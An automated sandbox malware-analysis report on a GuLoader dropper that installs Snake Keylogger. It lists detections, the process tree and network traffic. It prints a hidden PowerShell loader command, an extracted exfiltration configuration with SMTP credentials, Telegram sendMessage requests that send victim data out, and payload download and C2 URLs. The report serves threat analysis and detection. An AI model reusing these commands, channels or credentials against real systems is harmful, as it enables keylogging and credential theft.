Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rPedidoactualizado.exe

Overview

General Information

Sample name:rPedidoactualizado.exe
Analysis ID:1528590
MD5:e3ca439a218a7eeb9432b91fbf185559
SHA1:5a55427c13737ea23773ff25476c0590c8ec9b4b
SHA256:a73a2597cbb4d6a76b2ab9d0664e79ad99d257aab4683f7c68dd1321fa79f34b
Tags:exeuser-Porcupine
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • rPedidoactualizado.exe (PID: 2140 cmdline: "C:\Users\user\Desktop\rPedidoactualizado.exe" MD5: E3CA439A218A7EEB9432B91FBF185559)
    • powershell.exe (PID: 5408 cmdline: "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 2364 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "barclick@barclick.es", "Password": "1446010", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.2355081498.00000000096B6000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: msiexec.exe PID: 2364JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: msiexec.exe PID: 2364JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          System Summary

          barindex
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2364, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49828
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5408, TargetFilename: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)", CommandLine: "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPedidoactualizado.exe", ParentImage: C:\Users\user\Desktop\rPedidoactualizado.exe, ParentProcessId: 2140, ParentProcessName: rPedidoactualizado.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)", ProcessId: 5408, ProcessName: powershell.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-08T03:32:41.815821+020028033053Unknown Traffic192.168.2.549886188.114.96.3443TCP
          2024-10-08T03:32:46.415577+020028033053Unknown Traffic192.168.2.549922188.114.96.3443TCP
          2024-10-08T03:32:47.604805+020028033053Unknown Traffic192.168.2.549932188.114.96.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-08T03:32:40.146299+020028032742Potentially Bad Traffic192.168.2.549864158.101.44.24280TCP
          2024-10-08T03:32:41.240068+020028032742Potentially Bad Traffic192.168.2.549864158.101.44.24280TCP
          2024-10-08T03:32:43.458901+020028032742Potentially Bad Traffic192.168.2.549892158.101.44.24280TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-08T03:32:34.090406+020028032702Potentially Bad Traffic192.168.2.549828216.58.206.46443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
          Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
          Source: 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "barclick@barclick.es", "Password": "1446010", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
          Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exeVirustotal: Detection: 13%Perma Link
          Source: rPedidoactualizado.exeVirustotal: Detection: 13%Perma Link
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: rPedidoactualizado.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49880 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.5:49828 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.5:49838 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49966 version: TLS 1.2
          Source: rPedidoactualizado.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2354527727.0000000008DBD000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 004EF45Dh5_2_004EF2C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 004EF45Dh5_2_004EF4AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 004EF45Dh5_2_004EF52F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 004EFC19h5_2_004EF974

          Networking

          barindex
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:37:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49864 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49892 -> 158.101.44.242:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49922 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49828 -> 216.58.206.46:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49932 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49886 -> 188.114.96.3:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49880 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:37:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 08 Oct 2024 01:32:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: powershell.exe, 00000002.00000002.2349073799.0000000007A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microCI
          Source: rPedidoactualizado.exe, rPedidoactualizado.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000002.00000002.2344675031.0000000005426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000002.00000002.2344675031.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000002.00000002.2344675031.0000000005426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.2344675031.00000000052D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20a
          Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
          Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021600000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.00000000215F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: msiexec.exe, 00000005.00000002.3290429199.00000000215F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enN
          Source: msiexec.exe, 00000005.00000002.3290429199.00000000215FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
          Source: powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: msiexec.exe, 00000005.00000002.3277125256.000000000587A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: msiexec.exe, 00000005.00000002.3277125256.000000000587A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd
          Source: msiexec.exe, 00000005.00000003.2446661266.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2415047940.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3277125256.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
          Source: msiexec.exe, 00000005.00000003.2446661266.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2415047940.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3277125256.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/PV
          Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3277125256.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1xptRpTcxilm8Fyo6e-EyPnvXFK0-DkWd&export=download
          Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2344675031.0000000005426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: msiexec.exe, 00000005.00000002.3290429199.00000000214FE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.000000002148E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: msiexec.exe, 00000005.00000002.3290429199.000000002148E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: msiexec.exe, 00000005.00000002.3290429199.000000002148E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
          Source: msiexec.exe, 00000005.00000002.3290429199.00000000214FE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.00000000214B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
